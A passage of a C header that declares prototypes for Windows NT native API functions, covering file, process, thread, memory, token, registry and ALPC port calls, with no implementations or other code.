IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN PFILE_SEGMENT_ELEMENT SegmentArray,
IN ULONG Length,
IN PLARGE_INTEGER ByteOffset,
IN PULONG Key OPTIONAL);
EXTERN_C NTSTATUS NtCreateKey(
OUT PHANDLE KeyHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN ULONG TitleIndex,
IN PUNICODE_STRING Class OPTIONAL,
IN ULONG CreateOptions,
OUT PULONG Disposition OPTIONAL);
EXTERN_C NTSTATUS NtFreeVirtualMemory(
IN HANDLE ProcessHandle,
IN OUT PVOID* BaseAddress,
IN OUT PSIZE_T RegionSize,
IN ULONG FreeType);
EXTERN_C NTSTATUS NtImpersonateClientOfPort(
IN HANDLE PortHandle,
IN PPORT_MESSAGE Message);
EXTERN_C NTSTATUS NtReleaseMutant(
IN HANDLE MutantHandle,
OUT PULONG PreviousCount OPTIONAL);
EXTERN_C NTSTATUS NtQueryInformationToken(
IN HANDLE TokenHandle,
IN TOKEN_INFORMATION_CLASS TokenInformationClass,
OUT PVOID TokenInformation,
IN ULONG TokenInformationLength,
OUT PULONG ReturnLength);
EXTERN_C NTSTATUS NtRequestWaitReplyPort(
IN HANDLE PortHandle,
IN PPORT_MESSAGE RequestMessage,
OUT PPORT_MESSAGE ReplyMessage);
EXTERN_C NTSTATUS NtQueryVirtualMemory(
IN HANDLE ProcessHandle,
IN PVOID BaseAddress,
IN MEMORY_INFORMATION_CLASS MemoryInformationClass,
OUT PVOID MemoryInformation,
IN SIZE_T MemoryInformationLength,
OUT PSIZE_T ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtOpenThreadToken(
IN HANDLE ThreadHandle,
IN ACCESS_MASK DesiredAccess,
IN BOOLEAN OpenAsSelf,
OUT PHANDLE TokenHandle);
EXTERN_C NTSTATUS NtQueryInformationThread(
IN HANDLE ThreadHandle,
IN THREADINFOCLASS ThreadInformationClass,
OUT PVOID ThreadInformation,
IN ULONG ThreadInformationLength,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtOpenProcess(
OUT PHANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN PCLIENT_ID ClientId OPTIONAL);
EXTERN_C NTSTATUS NtSetInformationFile(
IN HANDLE FileHandle,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN PVOID FileInformation,
IN ULONG Length,
IN FILE_INFORMATION_CLASS FileInformationClass);
EXTERN_C NTSTATUS NtMapViewOfSection(
IN HANDLE SectionHandle,
IN HANDLE ProcessHandle,
IN OUT PVOID BaseAddress,
IN ULONG ZeroBits,
IN SIZE_T CommitSize,
IN OUT PLARGE_INTEGER SectionOffset OPTIONAL,
IN OUT PSIZE_T ViewSize,
IN SECTION_INHERIT InheritDisposition,
IN ULONG AllocationType,
IN ULONG Win32Protect);
EXTERN_C NTSTATUS NtAccessCheckAndAuditAlarm(
IN PUNICODE_STRING SubsystemName,
IN PVOID HandleId OPTIONAL,
IN PUNICODE_STRING ObjectTypeName,
IN PUNICODE_STRING ObjectName,
IN PSECURITY_DESCRIPTOR SecurityDescriptor,
IN ACCESS_MASK DesiredAccess,
IN PGENERIC_MAPPING GenericMapping,
IN BOOLEAN ObjectCreation,
OUT PACCESS_MASK GrantedAccess,
OUT PBOOLEAN AccessStatus,
OUT PBOOLEAN GenerateOnClose);
EXTERN_C NTSTATUS NtUnmapViewOfSection(
IN HANDLE ProcessHandle,
IN PVOID BaseAddress);
EXTERN_C NTSTATUS NtReplyWaitReceivePortEx(
IN HANDLE PortHandle,
OUT PULONG PortContext OPTIONAL,
IN PPORT_MESSAGE ReplyMessage OPTIONAL,
OUT PPORT_MESSAGE ReceiveMessage,
IN PLARGE_INTEGER Timeout OPTIONAL);
EXTERN_C NTSTATUS NtTerminateProcess(
IN HANDLE ProcessHandle OPTIONAL,
IN NTSTATUS ExitStatus);
EXTERN_C NTSTATUS NtSetEventBoostPriority(
IN HANDLE EventHandle);
EXTERN_C NTSTATUS NtReadFileScatter(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN PFILE_SEGMENT_ELEMENT SegmentArray,
IN ULONG Length,
IN PLARGE_INTEGER ByteOffset OPTIONAL,
IN PULONG Key OPTIONAL);
EXTERN_C NTSTATUS NtOpenThreadTokenEx(
IN HANDLE ThreadHandle,
IN ACCESS_MASK DesiredAccess,
IN BOOLEAN OpenAsSelf,
IN ULONG HandleAttributes,
OUT PHANDLE TokenHandle);
EXTERN_C NTSTATUS NtOpenProcessTokenEx(
IN HANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
IN ULONG HandleAttributes,
OUT PHANDLE TokenHandle);
EXTERN_C NTSTATUS NtQueryPerformanceCounter(
OUT PLARGE_INTEGER PerformanceCounter,
OUT PLARGE_INTEGER PerformanceFrequency OPTIONAL);
EXTERN_C NTSTATUS NtEnumerateKey(
IN HANDLE KeyHandle,
IN ULONG Index,
IN KEY_INFORMATION_CLASS KeyInformationClass,
OUT PVOID KeyInformation OPTIONAL,
IN ULONG Length,
OUT PULONG ResultLength);
EXTERN_C NTSTATUS NtOpenFile(
OUT PHANDLE FileHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN ULONG ShareAccess,
IN ULONG OpenOptions);
EXTERN_C NTSTATUS NtDelayExecution(
IN BOOLEAN Alertable,
IN PLARGE_INTEGER DelayInterval);
EXTERN_C NTSTATUS NtQueryDirectoryFile(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
OUT PVOID FileInformation,
IN ULONG Length,
IN FILE_INFORMATION_CLASS FileInformationClass,
IN BOOLEAN ReturnSingleEntry,
IN PUNICODE_STRING FileName OPTIONAL,
IN BOOLEAN RestartScan);
EXTERN_C NTSTATUS NtQuerySystemInformation(
IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
IN OUT PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtOpenSection(
OUT PHANDLE SectionHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes);
EXTERN_C NTSTATUS NtQueryTimer(
IN HANDLE TimerHandle,
IN TIMER_INFORMATION_CLASS TimerInformationClass,
OUT PVOID TimerInformation,
IN ULONG TimerInformationLength,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtFsControlFile(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PIO_APC_ROUTINE ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN ULONG FsControlCode,
IN PVOID InputBuffer OPTIONAL,
IN ULONG InputBufferLength,
OUT PVOID OutputBuffer OPTIONAL,
IN ULONG OutputBufferLength);
EXTERN_C NTSTATUS NtWriteVirtualMemory(
IN HANDLE ProcessHandle,
IN PVOID BaseAddress,
IN PVOID Buffer,
IN SIZE_T NumberOfBytesToWrite,
OUT PSIZE_T NumberOfBytesWritten OPTIONAL);
EXTERN_C NTSTATUS NtCloseObjectAuditAlarm(
IN PUNICODE_STRING SubsystemName,
IN PVOID HandleId OPTIONAL,
IN BOOLEAN GenerateOnClose);
EXTERN_C NTSTATUS NtDuplicateObject(
IN HANDLE SourceProcessHandle,
IN HANDLE SourceHandle,
IN HANDLE TargetProcessHandle OPTIONAL,
OUT PHANDLE TargetHandle OPTIONAL,
IN ACCESS_MASK DesiredAccess,
IN ULONG HandleAttributes,
IN ULONG Options);
EXTERN_C NTSTATUS NtQueryAttributesFile(
IN POBJECT_ATTRIBUTES ObjectAttributes,
OUT PFILE_BASIC_INFORMATION FileInformation);
EXTERN_C NTSTATUS NtClearEvent(
IN HANDLE EventHandle);
EXTERN_C NTSTATUS NtReadVirtualMemory(
IN HANDLE ProcessHandle,
IN PVOID BaseAddress OPTIONAL,
OUT PVOID Buffer,
IN SIZE_T BufferSize,
OUT PSIZE_T NumberOfBytesRead OPTIONAL);
EXTERN_C NTSTATUS NtOpenEvent(
OUT PHANDLE EventHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes);
EXTERN_C NTSTATUS NtAdjustPrivilegesToken(
IN HANDLE TokenHandle,
IN BOOLEAN DisableAllPrivileges,
IN PTOKEN_PRIVILEGES NewState OPTIONAL,
IN ULONG BufferLength,
OUT PTOKEN_PRIVILEGES PreviousState OPTIONAL,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtDuplicateToken(
IN HANDLE ExistingTokenHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN BOOLEAN EffectiveOnly,
IN TOKEN_TYPE TokenType,
OUT PHANDLE NewTokenHandle);
EXTERN_C NTSTATUS NtContinue(
IN PCONTEXT ContextRecord,
IN BOOLEAN TestAlert);
EXTERN_C NTSTATUS NtQueryDefaultUILanguage(
OUT PLANGID DefaultUILanguageId);
EXTERN_C NTSTATUS NtQueueApcThread(
IN HANDLE ThreadHandle,
IN PKNORMAL_ROUTINE ApcRoutine,
IN PVOID ApcArgument1 OPTIONAL,
IN PVOID ApcArgument2 OPTIONAL,
IN PVOID ApcArgument3 OPTIONAL);
EXTERN_C NTSTATUS NtYieldExecution();
EXTERN_C NTSTATUS NtAddAtom(
IN PWSTR AtomName OPTIONAL,
IN ULONG Length,
OUT PUSHORT Atom OPTIONAL);
EXTERN_C NTSTATUS NtCreateEvent(
OUT PHANDLE EventHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN EVENT_TYPE EventType,
IN BOOLEAN InitialState);
EXTERN_C NTSTATUS NtQueryVolumeInformationFile(
IN HANDLE FileHandle,
OUT PIO_STATUS_BLOCK IoStatusBlock,
OUT PVOID FsInformation,
IN ULONG Length,
IN FSINFOCLASS FsInformationClass);
EXTERN_C NTSTATUS NtCreateSection(
OUT PHANDLE SectionHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN PLARGE_INTEGER MaximumSize OPTIONAL,
IN ULONG SectionPageProtection,
IN ULONG AllocationAttributes,
IN HANDLE FileHandle OPTIONAL);
EXTERN_C NTSTATUS NtFlushBuffersFile(
IN HANDLE FileHandle,
OUT PIO_STATUS_BLOCK IoStatusBlock);
EXTERN_C NTSTATUS NtApphelpCacheControl(
IN APPHELPCACHESERVICECLASS Service,
IN PVOID ServiceData);
EXTERN_C NTSTATUS NtCreateProcessEx(
OUT PHANDLE ProcessHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN HANDLE ParentProcess,
IN ULONG Flags,
IN HANDLE SectionHandle OPTIONAL,
IN HANDLE DebugPort OPTIONAL,
IN HANDLE ExceptionPort OPTIONAL,
IN ULONG JobMemberLevel);
EXTERN_C NTSTATUS NtCreateThread(
OUT PHANDLE ThreadHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN HANDLE ProcessHandle,
OUT PCLIENT_ID ClientId,
IN PCONTEXT ThreadContext,
IN PUSER_STACK InitialTeb,
IN BOOLEAN CreateSuspended);
EXTERN_C NTSTATUS NtIsProcessInJob(
IN HANDLE ProcessHandle,
IN HANDLE JobHandle OPTIONAL);
EXTERN_C NTSTATUS NtProtectVirtualMemory(
IN HANDLE ProcessHandle,
IN OUT PVOID* BaseAddress,
IN OUT PSIZE_T RegionSize,
IN ULONG NewProtect,
OUT PULONG OldProtect);
EXTERN_C NTSTATUS NtQuerySection(
IN HANDLE SectionHandle,
IN SECTION_INFORMATION_CLASS SectionInformationClass,
OUT PVOID SectionInformation,
IN ULONG SectionInformationLength,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtResumeThread(
IN HANDLE ThreadHandle,
IN OUT PULONG PreviousSuspendCount OPTIONAL);
EXTERN_C NTSTATUS NtTerminateThread(
IN HANDLE ThreadHandle,
IN NTSTATUS ExitStatus);
EXTERN_C NTSTATUS NtReadRequestData(
IN HANDLE PortHandle,
IN PPORT_MESSAGE Message,
IN ULONG DataEntryIndex,
OUT PVOID Buffer,
IN ULONG BufferSize,
OUT PULONG NumberOfBytesRead OPTIONAL);
EXTERN_C NTSTATUS NtCreateFile(
OUT PHANDLE FileHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
OUT PIO_STATUS_BLOCK IoStatusBlock,
IN PLARGE_INTEGER AllocationSize OPTIONAL,
IN ULONG FileAttributes,
IN ULONG ShareAccess,
IN ULONG CreateDisposition,
IN ULONG CreateOptions,
IN PVOID EaBuffer OPTIONAL,
IN ULONG EaLength);
EXTERN_C NTSTATUS NtQueryEvent(
IN HANDLE EventHandle,
IN EVENT_INFORMATION_CLASS EventInformationClass,
OUT PVOID EventInformation,
IN ULONG EventInformationLength,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtWriteRequestData(
IN HANDLE PortHandle,
IN PPORT_MESSAGE Request,
IN ULONG DataIndex,
IN PVOID Buffer,
IN ULONG Length,
OUT PULONG ResultLength OPTIONAL);
EXTERN_C NTSTATUS NtOpenDirectoryObject(
OUT PHANDLE DirectoryHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes);
EXTERN_C NTSTATUS NtAccessCheckByTypeAndAuditAlarm(
IN PUNICODE_STRING SubsystemName,
IN PVOID HandleId OPTIONAL,
IN PUNICODE_STRING ObjectTypeName,
IN PUNICODE_STRING ObjectName,
IN PSECURITY_DESCRIPTOR SecurityDescriptor,
IN PSID PrincipalSelfSid OPTIONAL,
IN ACCESS_MASK DesiredAccess,
IN AUDIT_EVENT_TYPE AuditType,
IN ULONG Flags,
IN POBJECT_TYPE_LIST ObjectTypeList OPTIONAL,
IN ULONG ObjectTypeListLength,
IN PGENERIC_MAPPING GenericMapping,
IN BOOLEAN ObjectCreation,
OUT PACCESS_MASK GrantedAccess,
OUT PULONG AccessStatus,
OUT PBOOLEAN GenerateOnClose);
EXTERN_C NTSTATUS NtWaitForMultipleObjects(
IN ULONG Count,
IN PHANDLE Handles,
IN WAIT_TYPE WaitType,
IN BOOLEAN Alertable,
IN PLARGE_INTEGER Timeout OPTIONAL);
EXTERN_C NTSTATUS NtSetInformationObject(
IN HANDLE Handle,
IN OBJECT_INFORMATION_CLASS ObjectInformationClass,
IN PVOID ObjectInformation,
IN ULONG ObjectInformationLength);
EXTERN_C NTSTATUS NtCancelIoFile(
IN HANDLE FileHandle,
OUT PIO_STATUS_BLOCK IoStatusBlock);
EXTERN_C NTSTATUS NtTraceEvent(
IN HANDLE TraceHandle,
IN ULONG Flags,
IN ULONG FieldSize,
IN PVOID Fields);
EXTERN_C NTSTATUS NtPowerInformation(
IN POWER_INFORMATION_LEVEL InformationLevel,
IN PVOID InputBuffer OPTIONAL,
IN ULONG InputBufferLength,
OUT PVOID OutputBuffer OPTIONAL,
IN ULONG OutputBufferLength);
EXTERN_C NTSTATUS NtSetValueKey(
IN HANDLE KeyHandle,
IN PUNICODE_STRING ValueName,
IN ULONG TitleIndex OPTIONAL,
IN ULONG Type,
IN PVOID SystemData,
IN ULONG DataSize);
EXTERN_C NTSTATUS NtCancelTimer(
IN HANDLE TimerHandle,
OUT PBOOLEAN CurrentState OPTIONAL);
EXTERN_C NTSTATUS NtSetTimer(
IN HANDLE TimerHandle,
IN PLARGE_INTEGER DueTime,
IN PTIMER_APC_ROUTINE TimerApcRoutine OPTIONAL,
IN PVOID TimerContext OPTIONAL,
IN BOOLEAN ResumeTimer,
IN LONG Period OPTIONAL,
OUT PBOOLEAN PreviousState OPTIONAL);
EXTERN_C NTSTATUS NtAccessCheckByType(
IN PSECURITY_DESCRIPTOR SecurityDescriptor,
IN PSID PrincipalSelfSid OPTIONAL,
IN HANDLE ClientToken,
IN ULONG DesiredAccess,
IN POBJECT_TYPE_LIST ObjectTypeList,
IN ULONG ObjectTypeListLength,
IN PGENERIC_MAPPING GenericMapping,
OUT PPRIVILEGE_SET PrivilegeSet,
IN OUT PULONG PrivilegeSetLength,
OUT PACCESS_MASK GrantedAccess,
OUT PULONG AccessStatus);
EXTERN_C NTSTATUS NtAccessCheckByTypeResultList(
IN PSECURITY_DESCRIPTOR SecurityDescriptor,
IN PSID PrincipalSelfSid OPTIONAL,
IN HANDLE ClientToken,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_TYPE_LIST ObjectTypeList,
IN ULONG ObjectTypeListLength,
IN PGENERIC_MAPPING GenericMapping,
OUT PPRIVILEGE_SET PrivilegeSet,
IN OUT PULONG PrivilegeSetLength,
OUT PACCESS_MASK GrantedAccess,
OUT PULONG AccessStatus);
EXTERN_C NTSTATUS NtAccessCheckByTypeResultListAndAuditAlarm(
IN PUNICODE_STRING SubsystemName,
IN PVOID HandleId OPTIONAL,
IN PUNICODE_STRING ObjectTypeName,
IN PUNICODE_STRING ObjectName,
IN PSECURITY_DESCRIPTOR SecurityDescriptor,
IN PSID PrincipalSelfSid OPTIONAL,
IN ACCESS_MASK DesiredAccess,
IN AUDIT_EVENT_TYPE AuditType,
IN ULONG Flags,
IN POBJECT_TYPE_LIST ObjectTypeList OPTIONAL,
IN ULONG ObjectTypeListLength,
IN PGENERIC_MAPPING GenericMapping,
IN BOOLEAN ObjectCreation,
OUT PACCESS_MASK GrantedAccess,
OUT PULONG AccessStatus,
OUT PULONG GenerateOnClose);
EXTERN_C NTSTATUS NtAccessCheckByTypeResultListAndAuditAlarmByHandle(
IN PUNICODE_STRING SubsystemName,
IN PVOID HandleId OPTIONAL,
IN HANDLE ClientToken,
IN PUNICODE_STRING ObjectTypeName,
IN PUNICODE_STRING ObjectName,
IN PSECURITY_DESCRIPTOR SecurityDescriptor,
IN PSID PrincipalSelfSid OPTIONAL,
IN ACCESS_MASK DesiredAccess,
IN AUDIT_EVENT_TYPE AuditType,
IN ULONG Flags,
IN POBJECT_TYPE_LIST ObjectTypeList OPTIONAL,
IN ULONG ObjectTypeListLength,
IN PGENERIC_MAPPING GenericMapping,
IN BOOLEAN ObjectCreation,
OUT PACCESS_MASK GrantedAccess,
OUT PULONG AccessStatus,
OUT PULONG GenerateOnClose);
EXTERN_C NTSTATUS NtAcquireProcessActivityReference();
EXTERN_C NTSTATUS NtAddAtomEx(
IN PWSTR AtomName,
IN ULONG Length,
IN PRTL_ATOM Atom,
IN ULONG Flags);
EXTERN_C NTSTATUS NtAddBootEntry(
IN PBOOT_ENTRY BootEntry,
OUT PULONG Id OPTIONAL);
EXTERN_C NTSTATUS NtAddDriverEntry(
IN PEFI_DRIVER_ENTRY DriverEntry,
OUT PULONG Id OPTIONAL);
EXTERN_C NTSTATUS NtAdjustGroupsToken(
IN HANDLE TokenHandle,
IN BOOLEAN ResetToDefault,
IN PTOKEN_GROUPS NewState OPTIONAL,
IN ULONG BufferLength OPTIONAL,
OUT PTOKEN_GROUPS PreviousState OPTIONAL,
OUT PULONG ReturnLength);
EXTERN_C NTSTATUS NtAdjustTokenClaimsAndDeviceGroups(
IN HANDLE TokenHandle,
IN BOOLEAN UserResetToDefault,
IN BOOLEAN DeviceResetToDefault,
IN BOOLEAN DeviceGroupsResetToDefault,
IN PTOKEN_SECURITY_ATTRIBUTES_INFORMATION NewUserState OPTIONAL,
IN PTOKEN_SECURITY_ATTRIBUTES_INFORMATION NewDeviceState OPTIONAL,
IN PTOKEN_GROUPS NewDeviceGroupsState OPTIONAL,
IN ULONG UserBufferLength,
OUT PTOKEN_SECURITY_ATTRIBUTES_INFORMATION PreviousUserState OPTIONAL,
IN ULONG DeviceBufferLength,
OUT PTOKEN_SECURITY_ATTRIBUTES_INFORMATION PreviousDeviceState OPTIONAL,
IN ULONG DeviceGroupsBufferLength,
OUT PTOKEN_GROUPS PreviousDeviceGroups OPTIONAL,
OUT PULONG UserReturnLength OPTIONAL,
OUT PULONG DeviceReturnLength OPTIONAL,
OUT PULONG DeviceGroupsReturnBufferLength OPTIONAL);
EXTERN_C NTSTATUS NtAlertResumeThread(
IN HANDLE ThreadHandle,
OUT PULONG PreviousSuspendCount OPTIONAL);
EXTERN_C NTSTATUS NtAlertThread(
IN HANDLE ThreadHandle);
EXTERN_C NTSTATUS NtAlertThreadByThreadId(
IN ULONG ThreadId);
EXTERN_C NTSTATUS NtAllocateLocallyUniqueId(
OUT PLUID Luid);
EXTERN_C NTSTATUS NtAllocateReserveObject(
OUT PHANDLE MemoryReserveHandle,
IN POBJECT_ATTRIBUTES ObjectAttributes,
IN MEMORY_RESERVE_TYPE Type);
EXTERN_C NTSTATUS NtAllocateUserPhysicalPages(
IN HANDLE ProcessHandle,
IN OUT PULONG NumberOfPages,
OUT PULONG UserPfnArray);
EXTERN_C NTSTATUS NtAllocateUuids(
OUT PLARGE_INTEGER Time,
OUT PULONG Range,
OUT PULONG Sequence,
OUT PUCHAR Seed);
EXTERN_C NTSTATUS NtAllocateVirtualMemoryEx(
IN HANDLE ProcessHandle,
IN OUT PPVOID lpAddress,
IN ULONG_PTR ZeroBits,
IN OUT PSIZE_T pSize,
IN ULONG flAllocationType,
IN OUT PVOID DataBuffer OPTIONAL,
IN ULONG DataCount);
EXTERN_C NTSTATUS NtAlpcAcceptConnectPort(
OUT PHANDLE PortHandle,
IN HANDLE ConnectionPortHandle,
IN ULONG Flags,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN PALPC_PORT_ATTRIBUTES PortAttributes OPTIONAL,
IN PVOID PortContext OPTIONAL,
IN PPORT_MESSAGE ConnectionRequest,
IN OUT PALPC_MESSAGE_ATTRIBUTES ConnectionMessageAttributes OPTIONAL,
IN BOOLEAN AcceptConnection);
EXTERN_C NTSTATUS NtAlpcCancelMessage(
IN HANDLE PortHandle,
IN ULONG Flags,
IN PALPC_CONTEXT_ATTR MessageContext);
EXTERN_C NTSTATUS NtAlpcConnectPort(
OUT PHANDLE PortHandle,
IN PUNICODE_STRING PortName,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN PALPC_PORT_ATTRIBUTES PortAttributes OPTIONAL,
IN ULONG Flags,
IN PSID RequiredServerSid OPTIONAL,
IN OUT PPORT_MESSAGE ConnectionMessage OPTIONAL,
IN OUT PULONG BufferLength OPTIONAL,
IN OUT PALPC_MESSAGE_ATTRIBUTES OutMessageAttributes OPTIONAL,
IN OUT PALPC_MESSAGE_ATTRIBUTES InMessageAttributes OPTIONAL,
IN PLARGE_INTEGER Timeout OPTIONAL);
EXTERN_C NTSTATUS NtAlpcConnectPortEx(
OUT PHANDLE PortHandle,
IN POBJECT_ATTRIBUTES ConnectionPortObjectAttributes,
IN POBJECT_ATTRIBUTES ClientPortObjectAttributes OPTIONAL,
IN PALPC_PORT_ATTRIBUTES PortAttributes OPTIONAL,
IN ULONG Flags,
IN PSECURITY_DESCRIPTOR ServerSecurityRequirements OPTIONAL,
IN OUT PPORT_MESSAGE ConnectionMessage OPTIONAL,
IN OUT PSIZE_T BufferLength OPTIONAL,
IN OUT PALPC_MESSAGE_ATTRIBUTES OutMessageAttributes OPTIONAL,
IN OUT PALPC_MESSAGE_ATTRIBUTES InMessageAttributes OPTIONAL,
IN PLARGE_INTEGER Timeout OPTIONAL);
EXTERN_C NTSTATUS NtAlpcCreatePort(
OUT PHANDLE PortHandle,
IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
IN PALPC_PORT_ATTRIBUTES PortAttributes OPTIONAL);
EXTERN_C NTSTATUS NtAlpcCreatePortSection(
IN HANDLE PortHandle,
IN ULONG Flags,
IN HANDLE SectionHandle OPTIONAL,
IN SIZE_T SectionSize,
OUT PHANDLE AlpcSectionHandle,
OUT PSIZE_T ActualSectionSize);
EXTERN_C NTSTATUS NtAlpcCreateResourceReserve(
IN HANDLE PortHandle,
IN ULONG Flags,
IN SIZE_T MessageSize,
OUT PHANDLE ResourceId);
EXTERN_C NTSTATUS NtAlpcCreateSectionView(
IN HANDLE PortHandle,
IN ULONG Flags,
IN OUT PALPC_DATA_VIEW_ATTR ViewAttributes);
EXTERN_C NTSTATUS NtAlpcCreateSecurityContext(
IN HANDLE PortHandle,
IN ULONG Flags,
IN OUT PALPC_SECURITY_ATTR SecurityAttribute);
EXTERN_C NTSTATUS NtAlpcDeletePortSection(
IN HANDLE PortHandle,
IN ULONG Flags,
IN HANDLE SectionHandle);
EXTERN_C NTSTATUS NtAlpcDeleteResourceReserve(
IN HANDLE PortHandle,
IN ULONG Flags,
IN HANDLE ResourceId);
EXTERN_C NTSTATUS NtAlpcDeleteSectionView(
IN HANDLE PortHandle,
IN ULONG Flags,
IN PVOID ViewBase);
EXTERN_C NTSTATUS NtAlpcDeleteSecurityContext(
IN HANDLE PortHandle,
IN ULONG Flags,
IN HANDLE ContextHandle);
EXTERN_C NTSTATUS NtAlpcDisconnectPort(
IN HANDLE PortHandle,
IN ULONG Flags);
EXTERN_C NTSTATUS NtAlpcImpersonateClientContainerOfPort(
IN HANDLE PortHandle,
IN PPORT_MESSAGE Message,
IN ULONG Flags);
EXTERN_C NTSTATUS NtAlpcImpersonateClientOfPort(
IN HANDLE PortHandle,
IN PPORT_MESSAGE Message,
IN PVOID Flags);
EXTERN_C NTSTATUS NtAlpcOpenSenderProcess(
OUT PHANDLE ProcessHandle,
IN HANDLE PortHandle,
IN PPORT_MESSAGE PortMessage,
IN ULONG Flags,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes);
EXTERN_C NTSTATUS NtAlpcOpenSenderThread(
OUT PHANDLE ThreadHandle,
IN HANDLE PortHandle,
IN PPORT_MESSAGE PortMessage,
IN ULONG Flags,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes);
EXTERN_C NTSTATUS NtAlpcQueryInformation(
IN HANDLE PortHandle OPTIONAL,
IN ALPC_PORT_INFORMATION_CLASS PortInformationClass,
IN OUT PVOID PortInformation,
IN ULONG Length,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtAlpcQueryInformationMessage(
IN HANDLE PortHandle,
IN PPORT_MESSAGE PortMessage,
IN ALPC_MESSAGE_INFORMATION_CLASS MessageInformationClass,
OUT PVOID MessageInformation OPTIONAL,
IN ULONG Length,
OUT PULONG ReturnLength OPTIONAL);
EXTERN_C NTSTATUS NtAlpcRevokeSecurityContext(
IN HANDLE PortHandle,
IN ULONG Flags,
IN HANDLE ContextHandle);
EXTERN_C NTSTATUS NtAlpcSendWaitReceivePort(
IN HANDLE PortHandle,
IN ULONG Flags,
IN PPORT_MESSAGE SendMessage OPTIONAL,
IN OUT PALPC_MESSAGE_ATTRIBUTES SendMessageAttributes OPTIONAL,
OUT PPORT_MESSAGE ReceiveMessage OPTIONAL,
IN OUT PSIZE_T BufferLength OPTIONAL,
IN OUT PALPC_MESSAGE_ATTRIBUTES ReceiveMessageAttributes OPTIONAL,
IN PLARGE_INTEGER Timeout OPTIONAL);
EXTERN_C NTSTATUS NtAlpcSetInformation(
IN HANDLE PortHandle,
IN ALPC_PORT_INFORMATION_CLASS PortInformationClass,
IN PVOID PortInformation OPTIONAL,
IN ULONG Length);
EXTERN_C NTSTATUS NtAreMappedFilesTheSame(
IN PVOID File1MappedAsAnImage,
IN PVOID File2MappedAsFile);
EXTERN_C NTSTATUS NtAssignProcessToJobObject(
IN HANDLE JobHandle,
IN HANDLE ProcessHandle);
EXTERN_C NTSTATUS NtAssociateWaitCompletionPacket(
IN HANDLE WaitCompletionPacketHandle,
IN HANDLE IoCompletionHandle,
IN HANDLE TargetObjectHandle,
IN PVOID KeyContext OPTIONAL,
IN PVOID ApcContext OPTIONAL,
IN NTSTATUS IoStatus,
IN ULONG_PTR IoStatusInformation,
OUT PBOOLEAN AlreadySignaled OPTIONAL);
EXTERN_C NTSTATUS NtCallEnclave(
IN PENCLAVE_ROUTINE Routine,
IN PVOID Parameter,
IN BOOLEAN WaitForThread,
IN OUT PVOID ReturnValue OPTIONAL);
EXTERN_C NTSTATUS NtCancelIoFileEx(
IN HANDLE FileHandle,
IN PIO_STATUS_BLOCK IoRequestToCancel OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock);
EXTERN_C NTSTATUS NtCancelSynchronousIoFile(
IN HANDLE ThreadHandle,
IN PIO_STATUS_BLOCK IoRequestToCancel OPTIONAL,
OUT PIO_STATUS_BLOCK IoStatusBlock);
EXTERN_C NTSTATUS NtCancelTimer2(
IN HANDLE TimerHandle,
IN PT2_CANCEL_PARAMETERS Parameters);
EXTERN_C NTSTATUS NtCancelWaitCompletionPacket(
IN HANDLE WaitCompletionPacketHandle,
IN BOOLEAN RemoveSignaledPacket);
EXTERN_C NTSTATUS NtCommitComplete(
IN HANDLE EnlistmentHandle,
IN PLARGE_INTEGER TmVirtualClock OPTIONAL);
EXTERN_C NTSTATUS NtCommitEnlistment(
IN HANDLE EnlistmentHandle,
IN PLARGE_INTEGER TmVirtualClock OPTIONAL);
